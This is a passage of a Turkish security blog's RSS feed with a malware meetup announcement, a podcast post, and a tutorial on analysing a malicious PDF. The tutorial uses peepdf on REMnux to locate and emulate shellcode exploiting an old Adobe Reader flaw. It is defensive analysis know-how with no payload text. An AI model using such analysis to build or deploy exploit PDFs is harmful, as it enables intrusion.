		<link>http://www.mertsarica.com/?p=2721</link>
		<comments>http://www.mertsarica.com/?p=2721#comments</comments>
		<pubDate>Wed, 22 Feb 2012 06:25:16 +0000</pubDate>
		<dc:creator>M.S</dc:creator>
				<category><![CDATA[Duyurular]]></category>

		<guid isPermaLink="false">http://www.mertsarica.com/?p=2721</guid>
		<description><![CDATA[NetSec Ağ ve Bilgi Güvenliği Topluluğu 25 Şubat 2012′de “Siber Savaş Aracı Olarak Kötücül Yazılımlar” konusunda bilgi paylaşımı ve tanışma amaçlı Microsoft Türkiye sponsorluğunda Bellevue Residence’da buluşuyor. Buluşmada “Social Network Malware Attacks – Sosyal ortamlarda karşılaşılan kötücül yazılımlar”, ”Android dünyasının zararlı yazılımları”, ”Kötücül Yazılımlar (malware) analizinde kullanılan temel yöntem ve araçlar”, “Dinamik analiz araçlarının modern [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img onload="NcodeImageResizer.createOn(this);" class="aligncenter" title="Netsec Şubat" src="http://blog.bga.com.tr/wp-content/uploads/2012/01/netsec_subat.jpg" alt="" width="648" height="347" /></p>
<p><a href="http://www.lifeoverip.net/netsec-listesi">NetSec Ağ ve Bilgi Güvenliği Topluluğu</a> <strong>25 Şubat 2012′de “Siber Savaş Aracı Olarak Kötücül Yazılımlar” </strong>konusunda bilgi paylaşımı ve tanışma amaçlı <strong>Microsoft Türkiye </strong>sponsorluğunda Bellevue Residence’da buluşuyor.</p>
<p>Buluşmada “Social Network Malware Attacks – Sosyal ortamlarda karşılaşılan kötücül yazılımlar”, ”Android dünyasının zararlı yazılımları”, ”Kötücül Yazılımlar (malware) analizinde kullanılan temel yöntem ve araçlar”, “Dinamik analiz araçlarının modern malware ile imtihanı”, ve “dünyada kötücül yazılımların yayılması ile ilgili olarak yapılan araştırma sonucu oluşan SIR raporu ” konulu 5 farklı sunum yapılacaktır.<span id="more-2721"></span></p>
<p><img onload="NcodeImageResizer.createOn(this);" title="Daha fazla..." src="http://blog.bga.com.tr/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" alt="" /></p>
<p>Buluşmanın temel amacı bilgi güvenliği sektörü çalışanlarının biraraya gelip tanışması, iş birliktelerini arttırması ve bilgi paylaşımıdır.</p>
<p><strong>Etkinlik CISSP sertifikası sahipleri için 4 CPE <a href="http://blog.bga.com.tr/cissp-2/cissp-sertifikasi-sahipleri-icin-cpe-puani-toplama">değerindedir</a>.</strong></p>
<table border="0">
<tbody>
<tr>
<td><strong>Etkinlik Adı</strong></td>
<td><strong>Netsec Topluluk Buluşması / Siber Savaş Aracı Olarak Kötücül Yazılımlar</strong></td>
</tr>
<tr>
<td><strong>Düzenleyen</strong></td>
<td><strong><a href="http://www.lifeoverip.net/">NetSec Topluluğu</a>, </strong><strong><a href="http://www.bga.com.tr/" target="_blank">Bilgi Güvenliği AKADEMİSİ</a></strong></td>
</tr>
<tr>
<td><strong>Sponsor</strong></td>
<td><strong>Microsoft Türkiye</strong></td>
</tr>
<tr>
<td><strong>Tarih/Saat</strong></td>
<td>25 Şubat 2012 Cumartesi Saat 12:30-17:00</td>
</tr>
<tr>
<td><strong>Yer</strong></td>
<td></td>
</tr>
<tr>
<td><strong>Kayıt</strong></td>
<td><a href="http://www.lifeoverip.net/kayit.html" target="_blank"><img onload="NcodeImageResizer.createOn(this);" class="alignleft" title="kayit" src="http://www.bga.com.tr/wp-content/uploads/2011/01/kayit.gif" alt="" width="171" height="52" /></a>Etkinliğe kayıt olmak şartıyla tüm bilgi güvenliği uzmanları, meraklıları katılabilir.</td>
</tr>
<tr>
<td><strong>Katılımcıya Kazançları</strong></td>
<td>
<ul>
<li>Sektör içinde çalışanlar ile tanışma, güncel siber tehditler konusunda bilgi alışverişi, iş birliği venetwork oluşturma.</li>
</ul>
</td>
</tr>
<tr>
<td><strong>Hedef Kitle</strong></td>
<td>
<ul>
<li>Bilgi güvenliği yöneticileri</li>
<li>Ağ ve güvenlik mühendisleri</li>
<li>Hosting firmaları/ISP’ler</li>
<li>Telekom firmaları</li>
<li>Kamu kurum ve kuruluşları</li>
<li>Yazılımcılar</li>
</ul>
</td>
</tr>
<tr>
<td><strong>Ücret – Kontenjan</strong></td>
<td>Etkinliğimiz ücretsiz olup etkinlik için kontenjan sınırlıdır. Lütfen katılım durumunuz kesinse kayıt olunuz.</td>
</tr>
<tr>
<td><strong>Etkinlik Programı</strong></td>
<td>
<ul>
<li><strong>12:30-13:00 </strong>Tanışma ve Etkinlik Açılış Konuşması</li>
</ul>
<ul>
<li><strong>13:00-13:30</strong> Microsoft Security Intelligence Report (SIR)</li>
</ul>
<ul>
<li><strong>13:30-14:15 </strong>Malware Analizinde Kullanılan Temel Yöntem ve Araçlar<strong> Huzeyfe ÖNAL / BGA</strong></li>
<li><strong></strong><strong>14:15-14:30</strong> ARA</li>
</ul>
<ul>
<li><strong>14:30-15:15 </strong>Android Zararlı Yazılım Analizi<strong> Mert SARICA /IBTech</strong></li>
</ul>
<ul>
<li><strong>15:15-16:00 </strong>Social Network Malware Attacks<strong> Halil ÖZTÜRKCİ / ADEO</strong></li>
<li><strong></strong><strong>16:00-16:15</strong> ARA</li>
</ul>
<ul>
<li><strong>16:15-17:00 </strong>Dinamik Analiz Araçlarının Modern Malware ile İmtihanı<strong> Osman PAMUK / TÜBİTAK</strong></li>
</ul>
</td>
</tr>
</tbody>
</table>
<hr />
<p>İletişim için lütfen <strong> bilgi@lifeoverip.net </strong>adresine e-posta gönderiniz..</p>
<p><span style="text-decoration: underline;"><strong>Ulaşım</strong></span></p>
<p>Bellevue Residence Levent Mahallesi, Aydın Sokak. No:7 Levent, 34340 İstanbul/Türkiye</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mertsarica.com/?feed=rss2&#038;p=2721</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Zararlı PDF Analizi</title>
		<link>http://www.mertsarica.com/?p=2669</link>
		<comments>http://www.mertsarica.com/?p=2669#comments</comments>
		<pubDate>Mon, 23 Jan 2012 23:36:35 +0000</pubDate>
		<dc:creator>M.S</dc:creator>
				<category><![CDATA[Güvenlik]]></category>

		<guid isPermaLink="false">http://www.mertsarica.com/?p=2669</guid>
		<description><![CDATA[Eskiden art niyetli olsun veya olmasın bilgisayar korsanlarının hedef sistemlere sızmalarının arkasında yatan başlıca sebepler; hacktivism gayesiyle dünyaya mesaj verme, finansal fayda sağlamak amacıyla finansal bilgilere erişme, sistemde tespit edilen güvenlik zafiyetleri konusunda sistem yöneticilerini uyarma, kin ve nefret güdüleriyle hareket ederek hedef sistemlere zarar vermekti. Ancak zaman değişti ve uluslar, bilgisayar korsanlarından oluşan kendi [...]]]></description>
			<content:encoded><![CDATA[<p>Eskiden art niyetli olsun veya olmasın bilgisayar korsanlarının hedef sistemlere sızmalarının arkasında yatan başlıca sebepler; hacktivism gayesiyle dünyaya mesaj verme, finansal fayda sağlamak amacıyla finansal bilgilere erişme, sistemde tespit edilen güvenlik zafiyetleri konusunda sistem yöneticilerini uyarma, kin ve nefret güdüleriyle hareket ederek hedef sistemlere zarar vermekti. Ancak zaman değişti ve uluslar, bilgisayar korsanlarından oluşan kendi siber kuvvetlerini oluşturarak hackingi bir silah olarak diğer devletlere karşı kullanmaya başladılar. </p>
<p>Siber savaşın yaşandığı günümüzde çoğunlukla izlenen strateji zarardan çok kalıcı olarak hedef sistemlerde barınmaya çalışma ve olabildiğince hassas bilgilere ulaşma yönünde oluyor ve çoğunlukla arkasında ulusların olduğuna inanılan bu sızmalara Advanced persistent threat (APT) adı veriliyor. Her ne kadar APT tehditlerinin arkasında çoğunlukla çok iyi organize olmuş bir grubun, ulusun olduğuna ve sızmalarda ileri seviye zararlı yazılımlardan ve sofistike araçlardan faydalandıkları düşünülse de aslında RSA vakasında olduğu gibi sahte bir e-posta hazırlama becerisi, ofis dokümanlarını açmak için kullanılan bir uygulamada Fuzzer ile güvenlik zafiyeti keşfetme becerisi, bu zafiyeti istismar edecek kod parçasını (exploit) hazırlama becerisi ve son olarak kaynak kodlarına internette rastlayabileceğiniz bir aracı özelleştirme (örnek: modifiye edilmiş poison ivy) becerisi yeterli olmaktadır. Hele ki günümüzde bu işlerin nasıl yapılabileceğini anlatan sayısız makale olduğu düşünüldüğünde sıradan bir kurum için bile bu tehditin gerçekleşme olasılığı oldukça yüksek seviyelere çıkmaktadır.</p>
<p>Çoğunlukla ABD Savunma Sanayii şirketlerini hedef alan Çin&#8217;li grubun, sistemlere sızmak ve gizli belgeleri çalmak için kullandıkları <a href="http://www.networkworld.com/news/2012/011412-chinese-attack-us-dod-smart-254927.html" target="_blank">Sykipot</a> adındaki zararlı yazılımı bulaştırmak için 2007 yılından bu yana şirket çalışanlarına, zafiyete sahip istismar kodu içeren ofis dokümanları gönderdikleri ve bu yöntemin bir çok organize suç örgütü tarafından da kullanıldığı düşünüldüğünde genel kabul görmüş güvenlik kontrollerinin (ips, antivirüs, vs.) yetersiz olduğu anlaşılmaktadır. Durum böyle olunca da kullanıcılardan gelen ihbarlar doğrultusunda olası zararlı kod içeren ofis dokümanlarının analiz edilmesi bir kurum için kaçınılmazdır.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/pdfa1.jpg" alt="Zararlı PDF Analizi"/></p>
<p>Zararlı doküman analizinde analiz edilecek dosya Microsoft ofis dokümanı ise amaç, zararlı kod içerebilecek VB makro kodu, OLE verisi, kabuk kodu, PE dosyasını tespit etmektir. Bunun için <a href="http://www.reconstructer.org/code.html" target="_blank">OfficeMalScanner</a> ve <a href="http://blogs.technet.com/b/srd/archive/2009/09/14/offvis-updated-office-file-format-training-video-created.aspx" target="_blank">OffVis</a> araçlarından faydalanabilirsiniz.</p>
<p>Eğer analiz edilecek dosya PDF ise bu defa amaç, zararlı kod içerebilecek Javascript kodunu tespit etmektir. Bunun için de <a href="http://blog.didierstevens.com/programs/pdf-tools/" target="_blank">pdf-parser.py</a>, <a href="http://code.google.com/p/peepdf/" target="_blank">peepdf</a> ve <a href="http://esec-lab.sogeti.com/pages/Origami" target="_blank">Origami</a> gibi araçlardan faydalanabilirsiniz.</p>
<p>Örnek olarak malware.pdf adında zararlı kod içeren bir pdf dosyasını analiz etmek istersek yapacağımız ilk iş ayrı ayrı bu iş için tasarlanmış araçları indirmek yerine zararlı yazılım analizi gerçekleştirmek için özel olarak hazırlanmış ve bir çok aracı üzerinde barındıran <a href="http://zeltser.com/remnux/" target="_blank">REMnux</a> sanal işletim sistemini indirip kullanmaktır.</p>
<p>Kullanmaya başladığım bu işletim sisteminde, masaüstüne kopyaladığımız malware.pdf dosyasını peepdf aracı ile analiz etmek için <strong>peepdf.py -i malware.pdf</strong> komutunu yazarak bu pdf dosyası üzerinde javascript kodu olup olmadığını kontrol edebiliriz.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/pdfa2.jpg" alt="Zararlı PDF Analizi"/></p>
<p>Görüldüğü üzere peepdf aracı bize 4. objede (Object with JS code) javascript kodu olduğu bilgisini vermektedir. <strong>js_beautify object 4</strong> komutunu yazarak pdf dosyası içinde yer alan javascript kodunu düzgün bir biçimde görüntüleyebiliriz.</p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/pdfa3.jpg" alt="Zararlı PDF Analizi"/></p>
<p><img onload="NcodeImageResizer.createOn(this);" src="http://www.mertsarica.com/images/pdfa4.jpg" alt="Zararlı PDF Analizi"/></p>
<p>Analiz neticesinde oluşturulan kabuk kodununun (shellcode) Collab.CollectEmailInfo fonksiyonuna gönderiliyor olması sonucunda bu pdf dosyasının içinde <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5659" target="_blank">2008</a> yılından kalma Adobe PDF v8.1.1 ve önceki sürümlerinde bulunan zafiyeti istismar eden istismar kodunun (exploit) bulunduğunu öğrenmiş oluyoruz.</p>
<p>Kimi zaman bu örnekte olduğu gibi pdf dosyası içinde yer alan istismar kodunun hangi zafiyeti istismar ettiğini anlamak bu kadar kolay olmayabilir. Bu gibi durumlarda javascript kodu içinde yer alan kabuk kodunu <strong>set shellcode &#8220;kabuk kodu&#8221;</strong> komutu ile tanımladıktan sonra <strong>js_unescape variable shellcode</strong> komutu ile analiz edilebilir hale getirebilir, <strong>sctest variable shellcode</strong> komutu ile kabuk kodunun çalışmasını simüle edebilir, <a href="http://breakingcode.wordpress.com/2010/01/18/quickpost-converting-shellcode-to-executable-files-using-inlineegg/" target="_blank">shellcode2exe</a> aracı ile yürütülebilir programa (executable) çevirerek immunity debugger ile dinamik olarak analiz edebilirsiniz. </p>
<p>Bir sonraki yazıda görüşmek dileğiyle yeni yılın herkese güvenli günler dilerim.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mertsarica.com/?feed=rss2&#038;p=2669</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Güvenlik Sohbetleri</title>
		<link>http://www.mertsarica.com/?p=2653</link>
		<comments>http://www.mertsarica.com/?p=2653#comments</comments>
		<pubDate>Fri, 06 Jan 2012 19:35:51 +0000</pubDate>
		<dc:creator>M.S</dc:creator>
				<category><![CDATA[Güvenlik]]></category>
		<category><![CDATA[dinleti]]></category>
		<category><![CDATA[güvenlik sohbeti]]></category>
		<category><![CDATA[sertan kolat]]></category>
		<category><![CDATA[sohbet]]></category>
		<category><![CDATA[ömer albayrak]]></category>

		<guid isPermaLink="false">http://www.mertsarica.com/?p=2653</guid>
		<description><![CDATA[Uzun zamandan beri güvenlik dünyasından arkadaşlarla ayda bir defa bir araya gelerek güvenlik dünyasında olan bitenler üzerine keyifli sohbetler gerçekleştiriyorduk. En son buluşmamızda ise bu sohbeti kayıt altına almaya ve sizlerle paylaşmaya karar verdik. Umarım dinlerken en az sizler de bizler kadar keyif alırsınız. Olumlu/olumsuz, düşüncelerinizi, görüşlerinizi ve önerilerinizi bizlerle paylaşabilirseniz bundan sonra gerçekleştireceğimiz tüm [...]]]></description>
			<content:encoded><![CDATA[<p>Uzun zamandan beri güvenlik dünyasından arkadaşlarla ayda bir defa bir araya gelerek güvenlik dünyasında olan bitenler üzerine keyifli sohbetler gerçekleştiriyorduk. En son buluşmamızda ise bu sohbeti kayıt altına almaya ve sizlerle paylaşmaya karar verdik. Umarım dinlerken en az sizler de bizler kadar keyif alırsınız. </p>
<p>Olumlu/olumsuz, düşüncelerinizi, görüşlerinizi ve önerilerinizi bizlerle paylaşabilirseniz bundan sonra gerçekleştireceğimiz tüm sohbetlerimizi aynı şekilde kayıt altına alıyor ve sizlerle paylaşıyor oluruz, herkese keyifli dinletiler dileriz. </p>
<p><strong>Güvenlik Sohbetleri Bölüm 1</strong><br />
<strong>Tarih:</strong> 4 Ocak 2012 Çarşamba<br />
<strong>Konu:</strong> 2011 yılında güvenlik dünyasında kısaca olup bitenler.<br />
<strong>Katılımcılar:</strong> Mert SARICA, <a href="http://www.sertankolat.com/" title="http://www.sertankolat.com/" target="_blank">Sertan KOLAT</a>, <a href="http://sistemguvenligi.blogspot.com/" title="http://sistemguvenligi.blogspot.com/" target="_blank">Ömer ALBAYRAK</a><br />
<strong>Dinle:</strong> </p>
<p>Dilerseniz ses dosyasını <a href="http://www.mertsarica.com/sounds/zirve-20120104.mp3" target="_blank">buradan</a> indirebilirsiniz.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Güvenlik Sohbetleri Bölüm 2</strong><br />
<strong>Tarih:</strong> 21 Mart 2012 Çarşamba<br />
<strong>Konu:</strong> Mobil Platformlarda Zararlı Yazılımlar Üzerine.<br />
<strong>Katılımcılar:</strong> Mert SARICA, <a href="http://www.sertankolat.com/" title="http://www.sertankolat.com/" target="_blank">Sertan KOLAT</a>, <a href="http://sistemguvenligi.blogspot.com/" title="http://sistemguvenligi.blogspot.com/" target="_blank">Ömer ALBAYRAK</a>, Özgür ERDOĞAN<br />
<strong>Dinle:</strong> </p>
<p>Dilerseniz ses dosyasını <a href="http://www.mertsarica.com/sounds/zirve-20120321.mp3" target="_blank">buradan</a> indirebilirsiniz.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mertsarica.com/?feed=rss2&#038;p=2653</wfw:commentRss>
		<slash:comments>3</slash:comments>
<enclosure url="http://www.mertsarica.com/sounds/zirve-20120104.mp3" length="22002197" type="audio/mpeg" />
<enclosure url="http://www.mertsarica.com/sounds/zirve-20120321.mp3" length="35871269" type="audio/mpeg" />
		</item>
	</channel>
</rss>

